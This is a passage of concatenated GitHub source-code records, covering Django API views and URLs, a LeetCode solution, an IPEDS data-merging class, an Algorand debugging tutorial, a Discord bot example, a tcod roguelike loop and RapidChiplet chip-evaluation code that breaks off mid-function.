include(route_rating.urls)), #rate\n path('movies//', include(route_total.urls)),\n path('', include(route_norate.urls)),#norate\n]","repo_name":"GusGBalbino/MoviesDjangoAPI","sub_path":"library/library/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31054918967","text":"class Solution:\n def removeKdigits(self, num: str, k: int) -> str:\n stack = []\n for x in num:\n while stack and int(x) < int(stack[-1]) and k!=0:\n k-=1\n stack.pop()\n stack.append(x)\n stack = stack[:len(stack)-k]\n ans = \"\".join(stack)\n return str(int(ans)) if ans else \"0\"\n","repo_name":"jossyfresh/competetive-programing","sub_path":"MoveKDigits.py","file_name":"MoveKDigits.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6844924348","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\n\n# Create your views here.\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import Restaurant\n\nclass RestaurantView(View):\n\n @method_decorator(csrf_exempt)\n def dispatch(self, request, *args, **kwargs): #Modifica el comportamiento y salte restriccion\n return super().dispatch(request, *args, **kwargs)\n\n def get(self, request, id=0):\n if(id > 0):\n restaurants = list(Restaurant.objects.filter(id=id).values())\n if len(restaurants) > 0: #Si la longitud de restaurant\n restaurant = restaurants[0]\n datos = {'message': \"Success\", \"restaurant\": restaurant}\n else:\n datos = {'message': \"Not found..\"}\n return JsonResponse(datos)\n else:\n restaurants = list(Restaurant.objects.values()) #Serializamos json\n if len(restaurants) > 0:\n datos = {'message': \"Succes\", 'restaurants': restaurants}\n else:\n datos = {'message': \"Companies not found..\"}\n return JsonResponse(datos)\n\n def post(self, request):\n jdata = json.loads(request.body)\n Restaurant.objects.create(name=jdata['name'],\n type_restaurant=jdata['type_restaurant'],\n address=jdata['address'], phone=jdata['phone'] )\n datos = {'message': \"Success\"}\n return JsonResponse(datos)\n\n def put(self, request, id):\n jdata = json.loads(request.body)\n restaurants = list(Restaurant.objects.filter(id=id).values())\n if len(restaurants) > 0:\n restaurant = Restaurant.objects.get(id=id)\n restaurant.name = jdata['name']\n restaurant.type_restaurant = jdata['type_restaurant']\n restaurant.address = jdata['address']\n restaurant.phone = jdata['phone']\n restaurant.save()\n datos = {'message': \"Succes\"}\n else:\n datos = {'message': \"Not found..\"}\n return JsonResponse(datos)\n\n def delete(self, request, id):\n restaurants = list(Restaurant.objects.filter(id=id).values())\n if len(restaurants) > 0:\n Restaurant.objects.filter(id=id).delete()\n datos = {'message': \"Succes\"}\n else:\n datos = {'message': \"Companies not found..\"}\n return JsonResponse(datos)","repo_name":"danyelJoy/ApiRestaurant","sub_path":"restaurant/core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"155790057","text":"import pandas as pd\nfrom ipedstable import IpedsTable\nfrom copy import copy, deepcopy\n\n\nclass IpedsCollection(object):\n ''' A collection of multiple IpedsTables '''\n\n def __init__(self):\n self.meta = {}\n self.merged_table = IpedsTable(df=pd.DataFrame())\n\n def update_meta(\n self,\n name,\n table=None,\n filepath=None,\n keep_columns=None,\n map_values=None,\n col_levels = None,\n filter_values = None,\n category_columns = None,\n exclude_imputations=None):\n\n if name not in self.meta.keys():\n self.meta.update({name: {}})\n entry = self.meta[name]\n\n if table:\n if isinstance(table, IpedsTable):\n entry.update({'table': deepcopy(table)})\n else:\n raise TypeError('table must be an instance of IpedsTable')\n\n if filepath:\n entry.update({'filepath': filepath})\n\n if keep_columns:\n if isinstance(keep_columns, list)\\\n and ('unitid' not in keep_columns):\n keep_columns.append('unitid')\n entry.update({'keep_columns': keep_columns})\n\n if col_levels:\n entry.update({'col_levels': col_levels})\n\n if filter_values:\n entry.update({'filter_values': filter_values})\n\n if map_values:\n entry.update({'map_values': map_values})\n\n if category_columns:\n entry.update({'category_columns': category_columns})\n\n if exclude_imputations:\n entry.update({'exclude_imputations': exclude_imputations})\n\n def drop_meta(self, name):\n del self.meta[name]\n\n def get_row_counts(self):\n counts = dict([])\n for k in self.meta.keys():\n df = self.meta[k]['table'].df.copy()\n counts.update({k: {'all': len(df)}})\n df.dropna(how='any',inplace=True)\n counts[k].update({'full': len(df)})\n return counts\n\n def import_table(self, name):\n print(f\"importing table {name}\")\n entry = self.meta[name]\n if 'filepath' in entry.keys():\n table = IpedsTable(filepath=entry['filepath'])\n self.update_meta(name, table=table)\n del entry['filepath']\n\n def import_all(self):\n for name in self.meta.keys():\n self.import_table(name)\n\n def make_multicols(self, name):\n entry = self.meta[name]\n self._validate_table_import(name)\n if 'col_levels' in entry.keys():\n table = entry['table']\n col_levels = copy(entry['col_levels'])\n if 'unitid' in entry['col_levels']:\n col_levels.remove('unitid')\n col_levels.insert(0,'unitid')\n table.make_multicols(col_levels)\n\n def make_multicols_all(self):\n for name in self.meta.keys():\n print(f\"making multicols for {name}\")\n self.make_multicols(name)\n\n def clean_table(self, name, dropna=False):\n print(f\"cleaning table {name}\")\n # self.import_table(name)\n entry = self.meta[name]\n table = entry['table']\n if entry['keep_columns'] == 'all':\n entry['keep_columns'] = table.columns\n table.keep_columns(entry['keep_columns'])\n table.purge_imputations(entry['exclude_imputations'], how='all')\n if dropna:\n table.dropna(entry['keep_columns'], how='any')\n \n def clean_all(self, dropna=False):\n for name in self.meta.keys():\n self.clean_table(name, dropna=dropna)\n\n def filter_values(self, name):\n print(f\"filtering values in table {name}\")\n self._validate_table_import(name)\n entry = self.meta[name]\n if 'filter_values' in entry.keys():\n table = entry['table']\n table.filter_values(entry['filter_values'])\n\n def filter_all(self):\n for name in self.meta.keys():\n self.filter_values(name)\n\n def map_values(self, name):\n print(f\"mapping values in table {name}\")\n entry = self.meta[name]\n if 'map_values' in entry.keys():\n table = entry['table']\n table.map_values(entry['map_values'])\n\n def map_values_all(self):\n for name in self.meta.keys():\n self.map_values(name)\n\n def encode_columns(self, name):\n print(f\"encoding categorical columns in table {name}\")\n entry = self.meta[name]\n if 'category_columns' in entry.keys():\n table = entry['table']\n table.encode_columns(entry['category_columns'])\n\n def encode_columns_all(self):\n for name in self.meta.keys():\n self.encode_columns(name)\n\n def _validate_table_import(self, name):\n if 'table' not in self.meta[name].keys():\n raise KeyError('Table has not been imported.')\n\n def merge_table(self, name, how='inner', keep_table=True):\n print(f\"Merging {name} with merged_table\")\n self._validate_table_import(name)\n table = deepcopy(self.meta[name]['table'])\n if len(self.merged_table) == 0:\n self.merged_table.df = table.df\n else:\n self.merged_table.df = self.merged_table.df.merge(\n table.df,\n how=how,\n on='unitid',\n suffixes=('', '_'+name))\n if not keep_table:\n self.drop_meta(name)\n\n def merge_all(self, how='inner', keep_table=True):\n for name in self.meta.keys():\n self.merge_table(name, \n how=how, \n keep_table=keep_table)\n\n def pipeline_all(self, dropna=False, how='inner', keep_table=True):\n self.import_all()\n self.clean_all()\n self.map_values_all()\n self.filter_all()\n self.encode_columns_all()\n self.make_multicols_all()\n self.merge_all(how=how, keep_table=keep_table)\n","repo_name":"Fred-B-Berendse/ipeds_library","sub_path":"src/ipedscollection.py","file_name":"ipedscollection.py","file_ext":"py","file_size_in_byte":6022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10878329176","text":"from algosdk.v2client import algod\nfrom algosdk.dryrun_results import DryrunResponse, StackPrinterConfig\nfrom algosdk.atomic_transaction_composer import (\n AtomicTransactionComposer,\n TransactionWithSigner,\n)\nfrom algosdk.future import transaction\nfrom util import (\n create_app,\n create_asa,\n get_approval_program,\n get_clear_program,\n get_contract,\n)\nfrom beaker import sandbox\nfrom beaker.client.logic_error import LogicException\n\n\ndef main():\n # setup\n algod_client = sandbox.clients.get_algod_client()\n acct = sandbox.kmd.get_accounts().pop()\n\n approval_program, approval_bin, approval_map = get_approval_program(algod_client)\n _, clear_bin, _ = get_clear_program(algod_client)\n\n contract = get_contract()\n\n app_id, app_addr = create_app(\n algod_client,\n acct.address,\n acct.private_key,\n approval_bin,\n clear_bin,\n transaction.StateSchema(1, 0),\n transaction.StateSchema(0, 0),\n )\n\n asa_id = create_asa(\n algod_client, acct.address, acct.private_key, \"tmp_asset\", \"tmp\", 10000, 0\n )\n\n sp = algod_client.suggested_params()\n\n # TODO: Need to cover fees for the inner transaction (uncomment these lines)\n # sp.flat_fee = True # Tell the SDK we know exactly what our fee should be\n # sp.fee = 2000 # Cover 2 transaction (outer + inner)\n\n # Create transaction to bootstrap application\n atc = AtomicTransactionComposer()\n atc.add_method_call(\n app_id,\n contract.get_method_by_name(\"bootstrap\"),\n acct.address,\n sp,\n signer=acct.signer,\n # TODO: the asset id should be passed\n method_args=[0],\n # method_args=[asa_id],\n )\n\n try:\n atc.execute(algod_client, 4)\n except Exception as e:\n le = LogicException(e, approval_program, approval_map)\n print(\n f\"A Logic Exception was encountered: '{le.msg[:40]}...'\\n\\t{le.trace()}\\n\"\n )\n perform_dryrun(atc, algod_client)\n return\n\n # Create group transaction to send asset and call method\n atc = AtomicTransactionComposer()\n atc.add_method_call(\n app_id,\n contract.get_method_by_name(\"transfer\"),\n acct.address,\n sp,\n signer=acct.signer,\n method_args=[\n TransactionWithSigner(\n # TODO: make this not fail\n txn=transaction.AssetTransferTxn(acct.address, sp, app_addr, 9, asa_id),\n # txn=transaction.AssetTransferTxn(acct.address, sp, app_addr, 10, asa_id),\n signer=acct.signer,\n ),\n asa_id,\n ],\n )\n try:\n atc.execute(algod_client, 4)\n except Exception as e:\n le = LogicException(e, approval_program, approval_map)\n print(\n f\"A Logic Exception was encountered: '{le.msg[:55]}...'\\n\\t{le.trace()}\\n\"\n )\n perform_dryrun(atc, algod_client)\n return\n\n # Create group transaction to send asset and call method\n # See TODO in contracts/application.py\n atc = AtomicTransactionComposer()\n atc.add_method_call(\n app_id,\n contract.get_method_by_name(\"withdraw\"),\n acct.address,\n sp,\n signer=acct.signer,\n method_args=[asa_id],\n )\n try:\n atc.execute(algod_client, 4)\n except Exception as e:\n le = LogicException(e, approval_program, approval_map)\n print(\n f\"A Logic Exception was encountered: '{le.msg[:50]}...'\\n\\t{le.trace()}\\n\"\n )\n perform_dryrun(atc, algod_client)\n return\n\n\ndef perform_dryrun(atc: AtomicTransactionComposer, client: algod.AlgodClient):\n signed = atc.gather_signatures()\n drr = transaction.create_dryrun(client, signed)\n dryrun_result = DryrunResponse(client.dryrun(drr))\n for txn in dryrun_result.txns:\n if txn.app_call_rejected():\n print(txn.app_trace(StackPrinterConfig(max_value_width=0)))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"algorand-devrel/debugging","sub_path":"py/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"37028884422","text":"import disnake\nfrom disnake.ext import commands\n\nbot = commands.Bot(\"!\")\n\n@bot.slash_command(\n name=\"슬래쉬 커맨드\",\n description=\"간단한 예제\",\n options=[\n disnake.Option(\"문자열\", description=\"문자열\", required=True),\n disnake.Option(\n \"채널\", description=\"채널\", type=disnake.OptionType.channel\n ),\n disnake.Option(\n \"숫자\", description=\"숫자\", type=disnake.OptionType.integer\n ),\n ],\n)\nasync def command(inter, string, channel=None, number=1):\n channel = channel or inter.channel\n await inter.response.send_message(\n f\"Sending {string} {number}x to {channel.mention}\", ephemeral=True\n )\n await channel.send(string * number)","repo_name":"battlebotdev/DiscordPython","sub_path":"Disnake/Old SlashCommand Example.py","file_name":"Old SlashCommand Example.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"27969163413","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport petcolormaps\n\ncmap_names = [x for x in dir(petcolormaps) if x.count('_')==2]\n\n\ngradient = np.linspace(0, 1, 256)\ngradient = np.vstack((gradient, gradient))\ndef plot_color_gradients(cmap_list, nrows):\n fig, axes = plt.subplots(nrows=nrows, figsize=(8,0.3*nrows))\n fig.subplots_adjust(top=0.95, bottom=0.01, left=0.2, right=0.99)\n\n for ax, name in zip(axes, cmap_list):\n ax.imshow(gradient, aspect='auto', cmap=\n \teval('petcolormaps.%s'%name))\n pos = list(ax.get_position().bounds)\n x_text = pos[0] - 0.01\n y_text = pos[1] + pos[3]/2.\n fig.text(x_text, y_text, name, va='center', ha='right', fontsize=10)\n\n # Turn off *all* ticks & spines, not just the ones with colormaps.\n for ax in axes:\n ax.set_axis_off()\n\nplot_color_gradients(cmap_names, len(cmap_names))\nplt.savefig('all_colormaps.png')\n","repo_name":"juliusbierk/petcolormaps","sub_path":"print_all_colormaps.py","file_name":"print_all_colormaps.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6881026836","text":"import tcod\n\ndef main():\n width, height = 80, 60\n x, y = 40, 30\n \n # Load the font from a file\n tcod.console_set_custom_font('data\\dejavu10x10_gs_tc.png', tcod.FONT_TYPE_GREYSCALE | tcod.FONT_LAYOUT_TCOD)\n\n # Initialize the root console\n console = tcod.console_init_root(width, height, 'GPT RL', False)\n\n # Set the background color of the console\n console.bg[0:width, 0:height] = tcod.Color(0, 0, 0)\n\n # Set the foreground color of the console\n console.fg[0:width, 0:height] = tcod.Color(255, 255, 255)\n\n while not tcod.console_is_window_closed():\n # Clear the console\n console.clear()\n\n # Wait for key press and release\n key = tcod.console_wait_for_keypress(True)\n\n # Move the character based on the input\n if key.vk == tcod.KEY_UP:\n y = max(0, y - 1)\n elif key.vk == tcod.KEY_DOWN:\n y = min(height - 1, y + 1)\n elif key.vk == tcod.KEY_LEFT:\n x = max(0, x - 1)\n elif key.vk == tcod.KEY_RIGHT:\n x = min(width - 1, x + 1)\n\n # Draw a character on the console\n console.put_char(x, y, 64)\n\n # Blit the console to the root console (i.e., the main screen)\n tcod.console_blit(console, x, y, width, height, 40, 30, 0)\n\n # Update the screen\n tcod.console_flush()\n\n print(x, y)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"Touff-97/GPT-RL","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"3891678195","text":"# Import python libraries\nimport time\nimport math\nimport copy\nimport queue\nimport argparse\nimport random as rnd\n\n# Import RapidChiplet files\nimport helpers as hlp\nimport validation as vld\n\n# Compute the area summary\ndef compute_area_summary(chiplets, placement):\n\ttotal_chiplet_area = 0\n\t# Smallest and largest coordinates occupied by a chiplet\n\t(minx, miny, maxx, maxy) = (float(\"inf\"),float(\"inf\"),-float(\"inf\"),-float(\"inf\"))\n\t# Iterate through chiplets\n\tfor chiplet_desc in placement[\"chiplets\"]:\n\t\tchiplet = chiplets[chiplet_desc[\"name\"]]\n\t\t(x,y) = (chiplet_desc[\"position\"][\"x\"],chiplet_desc[\"position\"][\"y\"])\t# Position\n\t\t(w,h) = (chiplet[\"dimensions\"][\"x\"],chiplet[\"dimensions\"][\"y\"])\t\t\t# Dimensions\n\t\t# Add this chiplet's are to total area\n\t\ttotal_chiplet_area += (w * h)\n\t\t# Update min and max coordinates\n\t\tminx = min(minx, x)\n\t\tminy = min(miny, y)\n\t\tmaxx = max(maxx, x + w)\n\t\tmaxy = max(maxy, y + h)\n\t# Compute total interposer area\n\tchip_width = (maxx - minx)\n\tchip_height = (maxy - miny)\n\ttotal_interposer_area = chip_width * chip_height\n\tarea_summary = {\n\t\t\"chip_width\" : chip_width,\t\n\t\t\"chip_height\" : chip_height,\t\n\t\t\"total_chiplet_area\" : total_chiplet_area,\n\t\t\"total_interposer_area\" : total_interposer_area\n\t}\n\treturn area_summary\n\n# Compute the power summary\ndef compute_power_summary(chiplets, placement, packaging):\n\t# Compute power consumption of chiplets\n\ttotal_chiplet_power = 0\n\tfor chiplet_desc in placement[\"chiplets\"]:\n\t\tchiplet = chiplets[chiplet_desc[\"name\"]]\n\t\ttotal_chiplet_power += chiplet[\"power\"]\t\n\t# Compute power consumption of interposer routers\n\ttotal_interposer_power = (len(placement[\"interposer_routers\"]) * packaging[\"power_irouter\"]) if packaging[\"is_active\"] else 0\n\t# Compute total interposer area\n\ttotal_power = total_chiplet_power + total_interposer_power \n\tpower_summary = {\n\t\t\"total_power\" : total_power,\n\t\t\"total_chiplet_power\" : total_chiplet_power,\n\t\t\"total_interposer_power\" : total_interposer_power\n\t}\n\treturn power_summary\n\n# Compute all link lengths\ndef compute_link_summary(chiplets, placement, topology, packaging):\n\tlink_lengths = []\n\tlink_lengths_internal = {}\n\tfor link in topology:\n\t\tendpoints = [link[\"ep1\"],link[\"ep2\"]]\n\t\t# Compute positions of start-and endpoint\n\t\tpositions = []\n\t\tnode_ids = []\n\t\tfor endpoint in endpoints:\n\t\t\tif endpoint[\"type\"] == \"chiplet\":\n\t\t\t\tchiplet_desc = placement[\"chiplets\"][endpoint[\"outer_id\"]]\n\t\t\t\tchiplet = chiplets[chiplet_desc[\"name\"]]\n\t\t\t\t# Rotate the chiplet if needed\t\n\t\t\t\tchiplet = hlp.rotate_chiplet(chiplet, chiplet_desc[\"rotation\"])\n\t\t\t\tphy = chiplet[\"phys\"][endpoint[\"inner_id\"]]\n\t\t\t\tpositions.append((chiplet_desc[\"position\"][\"x\"] + phy[\"x\"],chiplet_desc[\"position\"][\"y\"] + phy[\"y\"]))\n\t\t\t\tnode_ids.append(endpoint[\"outer_id\"])\n\t\t\telse:\n\t\t\t\tirouter = placement[\"interposer_routers\"][endpoint[\"outer_id\"]]\n\t\t\t\tpositions.append((irouter[\"position\"][\"x\"],irouter[\"position\"][\"y\"]))\n\t\t\t\tnode_ids.append(len(placement[\"chiplets\"]) + endpoint[\"outer_id\"])\n\t\t# Compute link length\n\t\tif packaging[\"link_routing\"] == \"manhattan\":\n\t\t\tlength = sum([abs(positions[0][dim] - positions[1][dim]) for dim in range(2)])\n\t\t\tlink_lengths.append(length)\n\t\t\tlink_lengths_internal[tuple(node_ids)] = length\n\t\t\tlink_lengths_internal[tuple(reversed(node_ids))] = length\n\t\telif packaging[\"link_routing\"] == \"euclidean\":\n\t\t\tlength = math.sqrt(sum([abs(positions[0][dim] - positions[1][dim]) for dim in range(2)]))\n\t\t\tlink_lengths.append(length)\n\t\t\tlink_lengths_internal[tuple(node_ids)] = length\n\t\t\tlink_lengths_internal[tuple(reversed(node_ids))] = length\n\t# Summarize link lengths\n\tlink_summary = {\n\t\t\"avg\" : sum(link_lengths) / len(link_lengths),\n\t\t\"min\" : min(link_lengths),\n\t\t\"max\" : max(link_lengths),\n\t\t\"all\" : link_lengths\n\t}\n\treturn (link_summary, link_lengths_internal)\n\n# Compute the manufacturing cost estimate\ndef compute_manufacturing_cost(technology, chiplets, placement, packaging, area_summary):\n\t# First, compute the manufacturing cost per chiplet\n\tresults_per_chiplet = {}\n\tfor chiplet_name in set([x[\"name\"] for x in placement[\"chiplets\"]]):\n\t\tresults_per_chiplet[chiplet_name] = {}\n\t\tchiplet = chiplets[chiplet_name]\n\t\ttech = technology[chiplet[\"technology\"]]\n\t\twr = tech[\"wafer_radius\"]\t\t\t\t\t\t\t\t\t\t# Wafer radius\n\t\tdd = tech[\"defect_density\"]\t\t\t\t\t\t\t\t\t\t# Defect density\n\t\twc = tech[\"wafer_cost\"]\t\t\t\t\t\t\t\t\t\t\t# Wafer cost\n\t\tca = chiplet[\"dimensions\"][\"x\"] * chiplet[\"dimensions\"][\"y\"]\t# Chiplet area\n\t\t# Dies per wafer\n\t\tdies_per_wafer = int(math.floor(((math.pi * wr**2) / ca) - ((math.pi * 2 * wr) / math.sqrt(2 * ca))))\n\t\tresults_per_chiplet[chiplet_name][\"dies_per_wafer\"] = dies_per_wafer\n\t\t# Manufacturing yield\n\t\tmanufacturing_yield = 1.0 / (1.0 + dd * ca)\n\t\tresults_per_chiplet[chiplet_name][\"manufacturing_yield\"] = manufacturing_yield\n\t\t# Known good dies\n\t\tknown_good_dies = dies_per_wafer * manufacturing_yield\n\t\tresults_per_chiplet[chiplet_name][\"known_good_dies\"] = known_good_dies\n\t\t# Cost\n\t\tcost = wc / known_good_dies\n\t\tresults_per_chiplet[chiplet_name][\"cost\"] = cost\n\t# Next, compute the manufacturing cost of the interposer if an interposer is used\n\tresults_interposer = {\"cost\" : 0}\n\tif packaging[\"has_interposer\"]:\n\t\tip_tech = technology[packaging[\"interposer_technology\"]]\n\t\twr = ip_tech[\"wafer_radius\"]\t\t\t\t\t\t\t\t\t# Wafer radius\n\t\tdd = ip_tech[\"defect_density\"]\t\t\t\t\t\t\t\t# Defect density\n\t\twc = ip_tech[\"wafer_cost\"]\t\t\t\t\t\t\t\t\t# Wafer cost\n\t\tia = area_summary[\"total_interposer_area\"]\t\t\t\t\t\t# Interposer area\n\t\t# Dies per wafer\n\t\tdies_per_wafer = int(math.floor(((math.pi * wr**2) / ia) - ((math.pi * 2 * wr) / math.sqrt(2 * ia))))\n\t\tresults_interposer[\"dies_per_wafer\"] = dies_per_wafer\n\t\t# Manufacturing yield\n\t\tmanufacturing_yield = 1.0 / (1.0 + dd * ia)\n\t\tresults_interposer[\"manufacturing_yield\"] = manufacturing_yield\n\t\t# Known good dies\n\t\tknown_good_dies = dies_per_wafer * manufacturing_yield\n\t\tresults_interposer[\"known_good_dies\"] = known_good_dies\n\t\t# Cost\n\t\tcost = wc / known_good_dies\n\t\tresults_interposer[\"cost\"] = cost\n\t# Compute the overall cost per working chip\n\tpy = packaging[\"packaging_yield\"]\t\t\t\t\t\t\t\t\t# Packaging yield\n\ttotal_cost = (sum([results_per_chiplet[x[\"name\"]][\"cost\"] for x in placement[\"chiplets\"]]) + results_interposer[\"cost\"]) / py\n\treturn {\"total_cost\" : total_cost, \"interposer\" : results_interposer, \"chiplets\" : results_per_chiplet}\n\n# Constructs a graph where nodes are chiplets and interposer-routers and edges are links.\ndef construct_ici_graph(chiplets, placement, topology):\n\tc = len(placement[\"chiplets\"])\t\t\t\t# Number of chiplets\n\tr = len(placement[\"interposer_routers\"])\t# Number of interposer-routers\n\tn = c + r\t\t\t\t\t\t\t\t\t# Number of nodes in the graph\n\t# Construct adjacency list\n\tneighbors = [[] for i in range(n)]\n\t# Iterate through links\n\tfor link in topology:\n\t\tnid1 = (c if link[\"ep1\"][\"type\"] == \"irouter\" else 0) + link[\"ep1\"][\"outer_id\"]\n\t\tnid2 = (c if link[\"ep2\"][\"type\"] == \"irouter\" else 0) + link[\"ep2\"][\"outer_id\"]\n\t\tneighbors[nid1].append(nid2)\n\t\tneighbors[nid2].append(nid1)\n\t# Collect node attributes...\n\trelay_map = [None for i in range(n)]\n\tnodes_by_type = {\"C\" : [], \"M\" : [], \"I\" : []}\n\t#... for chiplets\t\n\tfor nid in range(c):\n\t\tchiplet = chiplets[placement[\"chiplets\"][nid][\"name\"]]\n\t\ttyp = chiplet[\"type\"][0].upper()\n\t\trelay_map[nid] = chiplet[\"relay\"]\n\t\tnodes_by_type[typ].append(nid)\n\t#... for interposer-routers \n\tfor nid in range(c, c+r):\n\t\trelay_map[nid] = True\n\t# Return graph\n\treturn (c, r, n, neighbors, relay_map, nodes_by_type)\n\n# Computes a full source-destination path for each combination of sending and receiving chiplets in the following\n# traffic classes: core->core, core->memory, core->io, memory->io\ndef construct_ici_routing(ici_graph, routing):\n\t(c, r, n, neighbors, relay_map, nodes_by_type) = ici_graph\n\t# Compute a routing per traffic-class.\n\tclasses = [\"C2C\",\"C2M\",\"C2I\",\"M2I\"]\n\t# The following two dictionaries are the result of this function - they fully determine the routing\n\tpaths_per_class = {cls : {} for cls in classes}\t\n\tn_paths_per_edge_per_class = {cls : {(src,dst) : 0 for src in range(n) for dst in neighbors[src]} for cls in classes}\n\t# Cover all traffic classes without running Dijkstra twice on the same start-vertex\n\tsrc_types = [\"C\",\"M\"]\t\n\tdst_types_by_src_type= {\"C\" : [\"C\",\"M\",\"I\"], \"M\" : [\"I\"]}\n\tfor src_type in src_types:\n\t\t# Run Dijkstra for each sending node in a given traffic class\n\t\t# We minimize the number of hops, not the latency.\n\t\tfor src in nodes_by_type[src_type]:\n\t\t\tdist = [float(\"inf\") for i in range(n)]\t\t\t\t# Distance from SRC in hops\n\t\t\tpreds = [[] for i in range(n)]\t\t\t\t\t\t# Predecessors (can be many for multiple shortest paths)\n\t\t\ttodo = queue.PriorityQueue()\t\t\t\t\t\t# Visited but not yet processed nodes\n\t\t\tdist[src] = 0\n\t\t\ttodo.put((0, src))\n\t\t\t# Explore paths from src to all chiplets\n\t\t\twhile todo.qsize() > 0:\n\t\t\t\t(cur_dist, cur) = todo.get()\n\t\t\t\t# A shorter path to the cur-node has been found -> skip\n\t\t\t\tif cur_dist > dist[cur]:\n\t\t\t\t\tcontinue\n\t\t\t\t# Iterate through neighbors of the cur-node\n\t\t\t\tfor nei in neighbors[cur]:\n\t\t\t\t\tnei_dist = cur_dist + 1\n\t\t\t\t\t# We found a path to nei that is shorter than the currently best known one\n\t\t\t\t\tif nei_dist < dist[nei]:\n\t\t\t\t\t\tdist[nei] = nei_dist\n\t\t\t\t\t\tpreds[nei] = [cur]\n\t\t\t\t\t\t# Only enqueue the \"nei\"-node for processing if it can relay traffic\t\n\t\t\t\t\t\tif relay_map[nei]:\n\t\t\t\t\t\t\ttodo.put((nei_dist, nei))\n\t\t\t\t\t# We found a path equally short than the shortest path\n\t\t\t\t\telif (routing in [\"random\",\"balanced\"]) and (nei_dist == dist[nei]) and (cur not in preds[nei]):\n\t\t\t\t\t\tpreds[nei].append(cur)\n\t\t\t# Use backtracking to construct all src->dst paths for the given traffic class\n\t\t\tfor dst_type in dst_types_by_src_type[src_type]:\n\t\t\t\tfor dst in nodes_by_type[dst_type]:\n\t\t\t\t\tcls = src_type + \"2\" + dst_type\n\t\t\t\t\t# Only look at paths with at least one hop\n\t\t\t\t\tif dst == src:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tpath = [dst]\n\t\t\t\t\tcur = dst\t\t\n\t\t\t\t\twhile cur != src:\n\t\t\t\t\t\t# Balance paths across links\n\t\t\t\t\t\tif routing == \"balanced\":\n\t\t\t\t\t\t\tn_paths = [n_paths_per_edge[(pred,cur)] for pred in preds[cur]]\n\t\t\t\t\t\t\tpred = preds[cur][n_paths.index(min(n_paths))]\n\t\t\t\t\t\t# Randomly select shortest paths\n\t\t\t\t\t\telif routing == \"random\":\n\t\t\t\t\t\t\tpred = preds[cur][rnd.randint(0,len(preds[cur])-1)]\n\t\t\t\t\t\t# Use the minimum index (what BookSim does)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpred = preds[cur][0]\n\t\t\t\t\t\tn_paths_per_edge_per_class[cls][(pred,cur)] += 1\n\t\t\t\t\t\tcur = pred\n\t\t\t\t\t\tpath.insert(0,cur)\t\n\t\t\t\t\tpaths_per_class[cls][(src,dst)] = path\n\t# Return results\n\treturn (paths_per_class, n_paths_per_edge_per_class)\n\t\n# Compute the proxy for the ICI latency\ndef compute_ici_latency(technology, chiplets, placement, packaging, ici_graph, ici_routing, link_latencies_internal):\n\t(c, r, n, neighbors, relay_map, nodes_by_type) = ici_graph\n\t(paths_per_class, n_paths_per_edge_per_class) = ici_routing\n\tici_latencies = {}\n\t# Dictionary with the latency of relaying a message through a given node\n\tnode_relay_latencies = [(packaging[\"latency_irouter\"] if i >= c else 0) for i in range(n)]\n\t# Dictionary with latencies of entering/exiting a given node\n\tnode_latencies = [None for i in range(c)]\n\t# List of dictionaries for edge latencies\n\tedge_latencies = [{nei : (packaging[\"link_latency\"] if packaging[\"link_latency_type\"] == \"constant\" else int(math.ceil(eval(packaging[\"link_latency\"])(link_latencies_internal[(i,nei)])))) for nei in neighbors[i]} for i in range(n)]\n\t# Iterate through chiplets\n\tfor i in range(len(placement[\"chiplets\"])):\n\t\tchiplet = chiplets[placement[\"chiplets\"][i][\"name\"]]\n\t\tinternal_latency = chiplet[\"internal_latency\"]\n\t\tphy_latency = technology[chiplet[\"technology\"]][\"phy_latency\"]\n\t\tnode_relay_latencies[i] = internal_latency + 2 * phy_latency\n\t\tnode_latencies[i] = internal_latency + phy_latency\n\t# Iterate through traffic classes\n\tfor traffic in [\"C2C\",\"C2M\",\"C2I\",\"M2I\"]:\n\t\t# Compute latencies of all paths in this class\n\t\tlatencies = []\n\t\tfor (src,dst) in paths_per_class[traffic]:\n\t\t\tpath = paths_per_class[traffic][(src,dst)]\n\t\t\tlat = node_latencies[path[0]]\t\t\t\t\t\t\t\t\t\t\t\t\t# Start-node\n\t\t\tlat += sum([node_relay_latencies[path[i]] for i in range(1, len(path)-1)])\t\t# Relaying chiplets\n\t\t\tlat += sum([edge_latencies[path[i]][path[i+1]] for i in range(len(path)-1)]) \t# Link latency\n\t\t\tlat += node_latencies[path[-1]]\t\t\t\t\t\t\t\t\t\t\t\t\t# End node\n\t\t\tlatencies.append(lat)\n\t\t# Compute and store statistics\n\t\tici_latencies[traffic] = {}\n\t\tici_latencies[traffic][\"avg\"] = sum(latencies) / len(latencies)\n\t\tici_latencies[traffic][\"min\"] = min(latencies)\n\t\tici_latencies[traffic][\"max\"] = max(latencies)\n\t\tici_latencies[traffic][\"all\"] = latencies\n\t# Return results\n\treturn ici_latencies\n\n# Compute the proxy for the ICI throughput \ndef compute_ici_throughput(chiplets, placement, ici_graph, ici_routing):\n\t(c, r, n, neighbors, relay_map, nodes_by_type) = 